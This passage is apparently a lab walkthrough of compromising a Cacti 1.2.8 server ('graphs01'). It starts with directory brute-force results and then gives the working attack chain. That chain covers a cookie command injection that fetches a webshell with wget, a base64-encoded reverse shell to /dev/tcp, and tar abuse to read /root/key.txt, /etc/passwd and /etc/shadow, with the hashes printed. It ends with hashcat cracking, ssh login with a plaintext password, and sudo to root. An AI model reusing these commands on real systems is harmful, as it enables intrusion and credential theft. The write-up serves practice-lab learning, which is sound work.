200 GET 69l 351w 35905c http://10.11.2.245/docs/images/data-source-profiles-edit2.png 200 GET 23l 223w 21025c http://10.11.2.245/docs/images/dev-21.preview.png 200 GET 185l 1167w 96832c http://10.11.2.245/docs/images/graph-01.png 200 GET 452l 2962w 241992c http://10.11.2.245/docs/images/users-permissions-templates.png 200 GET 131l 713w 69383c http://10.11.2.245/docs/images/dt-03.preview.png 200 GET 181l 1258w 95318c http://10.11.2.245/docs/images/data-templates-view.png 200 GET 261l 1548w 150005c http://10.11.2.245/docs/images/users-batch-copy2.png 200 GET 135l 888w 99720c http://10.11.2.245/docs/images/dev-13.preview.png 200 GET 45l 220w 18394c http://10.11.2.245/docs/images/r-dq-dt3.png 200 GET 43l 217w 16199c http://10.11.2.245/docs/images/dev-gt-07.png 200 GET 0l 0w 113499c http://10.11.2.245/docs/images/patch_creation_pull_request_3.png 200 GET 32l 205w 14488c http://10.11.2.245/docs/images/users-settings3.png 200 GET 113l 441w 30916c http://10.11.2.245/docs/images/data-collectors-edit-remote1.png 200 GET 157l 754w 85443c http://10.11.2.245/docs/images/system-utilities-viewagentcache.png 200 GET 80l 574w 57390c http://10.11.2.245/docs/images/dim-add11.preview.png 200 GET 93l 418w 41673c http://10.11.2.245/docs/images/aggregate-templates-edit6.png 200 GET 76l 398w 40175c http://10.11.2.245/docs/images/r-dq1_0.png 200 GET 43l 304w 37126c http://10.11.2.245/docs/images/system-utilities-boost1.png 200 GET 16l 117w 11205c http://10.11.2.245/docs/images/dev-gt-13.png 200 GET 35l 310w 32432c http://10.11.2.245/docs/images/dim-add12.preview.png 200 GET 70l 490w 54586c http://10.11.2.245/docs/images/dev-gt-08.png 200 GET 38l 194w 24738c http://10.11.2.245/docs/images/cacti_trees_screen.png 200 GET 28l 138w 12717c http://10.11.2.245/docs/images/dev-gt-01.preview.png 200 GET 50l 410w 42477c http://10.11.2.245/docs/images/aggregate-templates-edit1.png 200 GET 162l 926w 85644c http://10.11.2.245/docs/images/dq-02.preview.png 200 GET 159l 893w 97528c http://10.11.2.245/docs/images/dev-31.preview.png 200 GET 121l 783w 72601c http://10.11.2.245/docs/images/gt-11.preview.png 200 GET 64l 295w 28530c http://10.11.2.245/docs/images/dim-add06.preview.png 200 GET 50l 336w 34582c http://10.11.2.245/docs/images/graph-templates-edit1.png 200 GET 176l 942w 85972c http://10.11.2.245/docs/images/dev-10.preview.png 200 GET 170l 599w 55273c http://10.11.2.245/docs/images/r-dev2.png 200 GET 240l 1629w 138296c http://10.11.2.245/docs/images/graph-templates-item3.png 200 GET 43l 362w 34563c http://10.11.2.245/docs/images/automation-snmp-options-edit2.png 200 GET 111l 631w 61018c http://10.11.2.245/docs/images/dim-add08.preview.png 200 GET 193l 1184w 98272c http://10.11.2.245/docs/images/dev-dq-24.preview.png 200 GET 77l 664w 64276c http://10.11.2.245/docs/images/aggregate-templates-edit2.png 200 GET 222l 1269w 109296c http://10.11.2.245/docs/images/dev-dq-02.preview.png 200 GET 431l 2861w 238990c http://10.11.2.245/docs/images/users-permissions.png 200 GET 56l 373w 43284c http://10.11.2.245/docs/images/r-dq7.png 200 GET 202l 1209w 104853c http://10.11.2.245/docs/images/graph-templates-item4s.png 200 GET 449l 2932w 253618c http://10.11.2.245/docs/images/users-permissions-device.png 200 GET 280l 1623w 136399c http://10.11.2.245/docs/images/dev-gt-11.preview.png 200 GET 295l 2457w 153555c http://10.11.2.245/docs/images/patch_creation_pull_request_1.png 200 GET 32l 175w 19609c http://10.11.2.245/docs/images/dev-gt-02.png 200 GET 55l 276w 28418c http://10.11.2.245/docs/images/vdefs-edit2.png 200 GET 427l 2579w 217039c http://10.11.2.245/docs/images/dev-dq-26.preview.png 200 GET 168l 806w 78092c http://10.11.2.245/docs/images/data-queries-edit2.png 200 GET 142l 922w 99494c http://10.11.2.245/docs/images/data-queries-edit1.png 200 GET 57l 426w 45792c http://10.11.2.245/docs/images/automation-network-main.png 200 GET 305l 509w 54751c http://10.11.2.245/docs/images/cacti_sites_automation.JPG 200 GET 58l 296w 19388c http://10.11.2.245/docs/images/dq-13.png 200 GET 81l 407w 38062c http://10.11.2.245/docs/images/graph-templates-edit6.png 200 GET 40l 254w 30432c http://10.11.2.245/docs/images/automation-networks-edit2.png 200 GET 133l 843w 75990c http://10.11.2.245/docs/images/data-source-profiles-edit1.png 200 GET 110l 721w 68360c http://10.11.2.245/docs/images/cdef-01.preview.png 200 GET 124l 560w 49711c http://10.11.2.245/docs/images/dev-dt-05.png 200 GET 120l 766w 69970c http://10.11.2.245/docs/images/plugins-uninstall.png 200 GET 179l 1037w 85808c http://10.11.2.245/docs/images/dev-11.preview.png 200 GET 311l 2156w 188921c http://10.11.2.245/docs/images/users-delete1.png 200 GET 88l 606w 56996c http://10.11.2.245/docs/images/data-source-profiles.png 200 GET 24l 133w 12254c http://10.11.2.245/docs/images/device-template-new.png 200 GET 280l 1737w 149167c http://10.11.2.245/docs/images/data-templates-new2.png 200 GET 57l 345w 37643c http://10.11.2.245/docs/images/vdefs-edit1.png 200 GET 788l 4632w 536799c http://10.11.2.245/docs/images/cacti_system_utilities.JPG 200 GET 88l 577w 75410c http://10.11.2.245/docs/images/automation-networks-edit1.png 200 GET 64l 345w 34900c http://10.11.2.245/docs/images/external-links-edit1.png 200 GET 99l 846w 86342c http://10.11.2.245/docs/images/r-dev3.png 200 GET 132l 758w 92482c http://10.11.2.245/docs/images/data-debug3.png 200 GET 73l 323w 28991c http://10.11.2.245/docs/images/graph-templates-edit4.png 200 GET 74l 444w 43758c http://10.11.2.245/docs/images/user-domains-edit2.png 200 GET 77l 607w 54639c http://10.11.2.245/docs/images/r-dq3_0.png 200 GET 122l 602w 54379c http://10.11.2.245/docs/images/dev-gt-06.preview.png 200 GET 74l 525w 55099c http://10.11.2.245/docs/images/gt-02.preview.png 200 GET 157l 1105w 103643c http://10.11.2.245/docs/images/r-dq-dev3.png 200 GET 173l 1154w 81359c http://10.11.2.245/docs/images/device-templates-ssh-tunnel.png 200 GET 70l 585w 49453c http://10.11.2.245/docs/images/r-dq2.png 200 GET 93l 505w 50160c http://10.11.2.245/docs/images/automation-graph-rules-edit5.png 200 GET 67l 422w 43524c http://10.11.2.245/docs/images/data-templates-view-edit1.png 200 GET 71l 438w 47619c http://10.11.2.245/docs/images/r-dq3.png 200 GET 24l 157w 15324c http://10.11.2.245/docs/images/colors-edit1.png 200 GET 311l 756w 92417c http://10.11.2.245/docs/images/cacti_add_device_site.JPG 200 GET 69l 393w 40658c http://10.11.2.245/docs/images/r-dq4.png 200 GET 17l 100w 17557c http://10.11.2.245/docs/images/system-utilities-main3.png 200 GET 76l 557w 49022c http://10.11.2.245/docs/images/dim-add04.png 200 GET 41l 314w 24991c http://10.11.2.245/docs/images/dim-add09.preview.png 200 GET 173l 1258w 136954c http://10.11.2.245/docs/images/users-enable-disable2.png 200 GET 164l 979w 85678c http://10.11.2.245/docs/images/graph-10.png 200 GET 190l 1150w 98026c http://10.11.2.245/docs/images/dev-dq-21.preview.png 200 GET 229l 1487w 134635c http://10.11.2.245/docs/images/gt-06.preview.png 200 GET 453l 2736w 227403c http://10.11.2.245/docs/images/dev-gt-09.preview.png 200 GET 292l 1683w 139598c http://10.11.2.245/docs/images/dev-dq-22.preview.png 200 GET 70l 250w 23795c http://10.11.2.245/docs/images/data-input-methods-edit2.png 200 GET 58l 461w 42310c http://10.11.2.245/docs/images/vdefs-edit4.png 200 GET 233l 1034w 116598c http://10.11.2.245/docs/images/dev-30.png 200 GET 123l 1037w 74436c http://10.11.2.245/docs/images/r-dq-dev1_0.png 200 GET 95l 486w 48671c http://10.11.2.245/docs/images/dc-01.preview.png 200 GET 52l 342w 31740c http://10.11.2.245/docs/images/vdefs-edit3.png 200 GET 50l 301w 33334c http://10.11.2.245/docs/images/r-dt1.png 200 GET 165l 1141w 87502c http://10.11.2.245/docs/images/graph-templates-item3s.png 200 GET 178l 743w 84994c http://10.11.2.245/docs/images/system-utilities-viewdqcache.png 200 GET 80l 264w 35462c http://10.11.2.245/docs/images/cacti_thold_enable.JPG 200 GET 113l 620w 54483c http://10.11.2.245/docs/images/users-settings1.png 200 GET 181l 896w 87158c http://10.11.2.245/docs/images/dim-add16.preview.png 200 GET 329l 1180w 112986c http://10.11.2.245/docs/images/cacti_remote_poller_setup.JPG 200 GET 54l 322w 22674c http://10.11.2.245/docs/images/dq-14.png 200 GET 125l 965w 86601c http://10.11.2.245/docs/images/device-templates-ssh-add-device.png 200 GET 41l 217w 20856c http://10.11.2.245/docs/images/data-templates-copy.png 200 GET 134l 532w 66811c http://10.11.2.245/docs/images/cacti_device_datasource.JPG 200 GET 68l 437w 45277c http://10.11.2.245/docs/images/aggregate-templates-edit3.png 200 GET 190l 643w 56494c http://10.11.2.245/docs/images/r-gt1.png 200 GET 63l 274w 27621c http://10.11.2.245/docs/images/dim-add02.preview.png 200 GET 93l 731w 92945c http://10.11.2.245/docs/images/data-debug1.png 200 GET 141l 1013w 98103c http://10.11.2.245/docs/images/dt-04.preview.png 200 GET 104l 623w 65499c http://10.11.2.245/docs/images/r-dq-dt1.png 200 GET 155l 978w 82565c http://10.11.2.245/docs/images/automation-graph-rules-edit1.png 200 GET 79l 612w 60949c http://10.11.2.245/docs/images/data-source-title-example2.png 200 GET 291l 1603w 204683c http://10.11.2.245/docs/images/cacti_graph_managment.JPG 200 GET 86l 588w 58425c http://10.11.2.245/docs/images/vdefs.png 200 GET 78l 429w 40890c http://10.11.2.245/docs/images/gt-01.preview.png 200 GET 291l 1440w 127158c http://10.11.2.245/docs/images/colors-edit2.png 200 GET 0l 0w 60055c http://10.11.2.245/include/vendor/flag-icon-css/ 200 GET 68l 509w 45491c http://10.11.2.245/docs/images/color-templates-edit2.png 200 GET 113l 620w 54483c http://10.11.2.245/docs/images/users-settings.png 200 GET 384l 2129w 186504c http://10.11.2.245/docs/images/router_ping_graph.png 200 GET 464l 2555w 217983c http://10.11.2.245/docs/images/dq-add-03.preview.png 200 GET 276l 1670w 149138c http://10.11.2.245/docs/images/dev-gt-14.preview.png 200 GET 0l 0w 71584c http://10.11.2.245/docs/images/snmp_dqw_table1.png 200 GET 87l 654w 71962c http://10.11.2.245/docs/images/data-queries.png 200 GET 93l 804w 78620c http://10.11.2.245/docs/images/r-dq-dev2.png 200 GET 157l 839w 91942c http://10.11.2.245/docs/images/dim-add14.preview.png 200 GET 114l 480w 42963c http://10.11.2.245/docs/images/data-collectors.png 200 GET 88l 676w 52210c http://10.11.2.245/docs/images/cdefs.png 200 GET 387l 2663w 222643c http://10.11.2.245/docs/images/users-edit.png 200 GET 510l 2963w 258085c http://10.11.2.245/docs/images/new_graphs.png 200 GET 94l 633w 60710c http://10.11.2.245/docs/images/device-template-new-dqs.png 200 GET 106l 926w 82319c http://10.11.2.245/docs/images/colors.png 200 GET 141l 770w 65301c http://10.11.2.245/docs/images/graph-templates-item1s.png 200 GET 102l 893w 91657c http://10.11.2.245/docs/images/data-debug2.PNG 200 GET 118l 920w 138782c http://10.11.2.245/docs/images/system-utilities-viewclog.png 200 GET 337l 2272w 181540c http://10.11.2.245/docs/images/new_device.png 200 GET 919l 4838w 403135c http://10.11.2.245/docs/images/cacti-tree-view-page.png 200 GET 344l 1989w 201006c http://10.11.2.245/docs/images/device-template.png 200 GET 205l 650w 11661c http://10.11.2.245/sites.php 200 GET 334l 3195w 71547c http://10.11.2.245/docs/images/ 200 GET 205l 650w 11663c http://10.11.2.245/plugins.php 200 GET 0l 0w 73491c http://10.11.2.245/docs/images/graph-templates-item2.png 200 GET 17l 71w 1201c http://10.11.2.245/include/vendor/flag-icon-css/flags/ 200 GET 205l 650w 11663c http://10.11.2.245/install/install.php 200 GET 205l 650w 11665c http://10.11.2.245/utilities.php 200 GET 205l 650w 11664c http://10.11.2.245/settings.php 200 GET 1l 4w 1482c http://10.11.2.245/include/themes/modern/images/tab_list.gif 200 GET 1l 6w 1519c http://10.11.2.245/include/themes/modern/images/tab_preview.gif 200 GET 5l 8w 1496c http://10.11.2.245/include/themes/modern/images/tab_tree.gif 200 GET 205l 650w 11660c http://10.11.2.245/host.php 200 GET 166l 624w 11605c http://10.11.2.245/graph.php 200 GET 390l 1187w 18560c http://10.11.2.245/graph_view.php 200 GET 205l 650w 11661c http://10.11.2.245/color.php 200 GET 205l 650w 11662c http://10.11.2.245/graphs.php 200 GET 280l 2496w 15141c http://10.11.2.245/LICENSE 200 GET 21l 171w 1087c http://10.11.2.245/include/vendor/flag-icon-css/LICENSE 200 GET 205l 650w 11660c http://10.11.2.245/tree.php 200 GET 1l 11w 74c http://10.11.2.245/cmd.php ```

Initial Foothold https://zerontek.blogspot.com/2020/10/hacking-walkthrough-cacti-128-ubuntu.html

🐺 howlsec@kali
$#Exploit with msfconsole https://www.exploit-db.com/exploits/48159
$#Manual exploit with https://zerontek.blogspot.com/2020/10/hacking-walkthrough-cacti-128-ubuntu.html
$Followed Manual Exploit with Burp
$GET /graph_realtime.php?action=init
$#Cookie needs to be URL encoded
$;wget${IFS}http://172.16.1.1/webshell.php
$#Used Myerweb https://meyerweb.com/eric/tools/dencoder/
$%3Bwget%24%7BIFS%7Dhttp%3A%2F%2F172.16.1.1%2Fwebshell.php
$#Setup a python webserver and webshell.php script I used was P0wny shell from revshell.com
$#After that I used base encoded webshell to get it in my terminal
$kali㉿kali)-[~/VHL/graphs01]
$└─$ echo "sh -i >& /dev/tcp/172.16.1.1/443 0>&1" | base64
$c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE2LjEuMS80NDMgMD4mMQo=
$┌──(kali㉿kali)-[~/VHL/graphs01]
$└─$ echo "c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE2LjEuMS80NDMgMD4mMQo=" | base64 -d | bash

(screenshot omitted)

Privesc

🐺 howlsec@kali
$#Upgrade to TTY
$python3 -c 'import pty;pty.spawn("/bin/bash")'
$#Privesc is done with tar capabilities

(screenshot omitted)

🐺 howlsec@kali
$#You can read files and I was able to read key.txt
$LFILE=/root/key.txt
$tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
$wanyyiymqs7tjjts8u0n

(screenshot omitted)

🐺 howlsec@kali
$#You can get root but reading/copying /etc/passwd & /etc/shadow
$www-data@graphs01:/var/www/html$ LFILE=/etc/passwd
$LFILE=/etc/passwd
$www-data@graphs01:/var/www/html$ tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
$tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
$root:x:0:0:root:/root:/bin/bash
$daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
$bin:x:2:2:bin:/bin:/usr/sbin/nologin
$sys:x:3:3:sys:/dev:/usr/sbin/nologin
$sync:x:4:65534:sync:/bin:/bin/sync
$games:x:5:60:games:/usr/games:/usr/sbin/nologin
$man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
$lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
$mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
$news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
$uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
$proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
$www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
$backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
$list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
$irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
$gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
$nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
$systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
$systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
$syslog:x:102:106::/home/syslog:/usr/sbin/nologin
$messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
$_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
$lxd:x:105:65534::/var/lib/lxd/:/bin/false
$uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
$dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
$landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
$pollinate:x:109:1::/var/cache/pollinate:/bin/false
$sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
$graphs:x:1000:1000:graphs:/home/graphs:/bin/bash
$mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
$Debian-snmp:x:112:115::/var/lib/snmp:/bin/false
$ftp:x:113:116:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
$www-data@graphs01:/var/www/html$ LFILE=/etc/shadow
$LFILE=/etc/shadow
$www-data@graphs01:/var/www/html$ tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
$tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
$root:$6$BE5bv4uN$AYPww6C5VLkX2FvzTXa4d3X7kMPg/.A2GmqxP/R//uff.nYhqHCE82nqcPzCuvWpKOucP31PvOKWJ2umWNW0w.:18369:0:99999:7:::
$daemon:*:18113:0:99999:7:::
$bin:*:18113:0:99999:7:::
$sys:*:18113:0:99999:7:::
$sync:*:18113:0:99999:7:::
$games:*:18113:0:99999:7:::
$man:*:18113:0:99999:7:::
$lp:*:18113:0:99999:7:::
$mail:*:18113:0:99999:7:::
$news:*:18113:0:99999:7:::
$uucp:*:18113:0:99999:7:::
$proxy:*:18113:0:99999:7:::
$www-data:*:18113:0:99999:7:::
$backup:*:18113:0:99999:7:::
$list:*:18113:0:99999:7:::
$irc:*:18113:0:99999:7:::
$gnats:*:18113:0:99999:7:::
$nobody:*:18113:0:99999:7:::
$systemd-network:*:18113:0:99999:7:::
$systemd-resolve:*:18113:0:99999:7:::
$syslog:*:18113:0:99999:7:::
$messagebus:*:18113:0:99999:7:::
$_apt:*:18113:0:99999:7:::
$lxd:*:18113:0:99999:7:::
$uuidd:*:18113:0:99999:7:::
$dnsmasq:*:18113:0:99999:7:::
$landscape:*:18113:0:99999:7:::
$pollinate:*:18113:0:99999:7:::
$sshd:*:18324:0:99999:7:::
$graphs:$6$ktQIuVEP$7Y0XDRn1WMHe06qlwIeV3eSrtymybugem.9xWUw7uPzXn.OdFkcK5Us/fbrPLT6DVrNLGx5jv57CbQCJabImj1:18372:0:99999:7:::
$mysql:!:18324:0:99999:7:::
$Debian-snmp:!:18324:0:99999:7:::
$ftp:*:18369:0:99999:7:::
$#once you save both files on yor kali machine, you can crack Hash for graphs user and then ssh into the box
$unshadow passwd shadow >> text
$hashcat -m 1800 text /usr/share/wordlists/rockyou.txt

(screenshot omitted)

🐺 howlsec@kali
$#Privesc with graphs user
$ssh graphs@10.11.2.245 california
$# sudo -l
$graphs@graphs01:~$ sudo -l
$[sudo] password for graphs:
$Matching Defaults entries for graphs on graphs01:
$ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
$
$User graphs may run the following commands on graphs01:
$ (ALL : ALL) ALL
$graphs@graphs01:~$ sudo su
$root@graphs01:/home/graphs# cd /root
$root@graphs01:~# cat key.txt
$wanyyiymqs7tjjts8u0n
$root@graphs01:~#

(screenshot omitted)